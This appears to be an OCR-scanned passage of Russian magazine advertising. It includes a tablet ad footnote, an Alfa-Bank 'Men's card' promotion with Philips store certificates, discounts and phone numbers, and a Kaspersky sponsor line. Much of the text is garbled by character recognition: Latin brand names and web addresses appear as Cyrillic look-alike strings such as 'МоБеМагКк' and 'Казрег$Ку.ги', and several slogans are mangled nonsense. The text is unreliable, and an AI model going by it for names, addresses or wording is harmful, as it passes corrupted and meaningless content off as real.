
и развлечений! 


Конфигурация и комплект поставки зависят от конкретной модели планшетного ПК. 


* Время работы на батарее указано по результатам теста МоБеМагКк (МобайлМарк) и может зависеть от конфигурации, 
настроек и запущенных приложений. 


Красивая, быстрая, плавная М \Мпдом 8 


АТТУ - Аг+ от Тесбпо|оду, Тпзрига Чоп о? Мегза К ц*. 
*Искусство Технологий, Безграничные Возможности. 5таг* РС - Умный ПК, Рго - Профессиональный, РуЙНО - высокая четкость. Товар сертифицирован. Реклама. 


на правах рекламы 


РНР 


55РНЕ-8008: 


с 01 по 31 июля 


держателям «Мужской карты» 15 сертификатов 
по 3000 рублей от фирменного интернет-магазина 
5пор.ри!!рз.ги 


Также с 15 июня по 15 сентября для всех держателей карты 
действует 15% скидка. * 


* подробности на сайте млмми.папсага.ги 


Оформить дебетовую или кредитную «Мужскую карту» 
можно на сайте у/мима!аБапК.ги или позвонив 
по телефонам: 


8 (495) 788-88-78 в Москве 
8-800-2000-000 в регионах России (звонок бесплатный) 


МАХМ А лльфа-Банк (дате)!апй 


ОАО «Альфа-Банк». Генеральная лицензия банка России на осуществление банковских операций от 05.03.2012 №1326 
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с 01.04.2013 до 31.07.2013 


Подробнее на 


Казрег$Ку.ги/1Т1. 


$РОМ$ОК 


$СУРЕКА РЕККАК! 


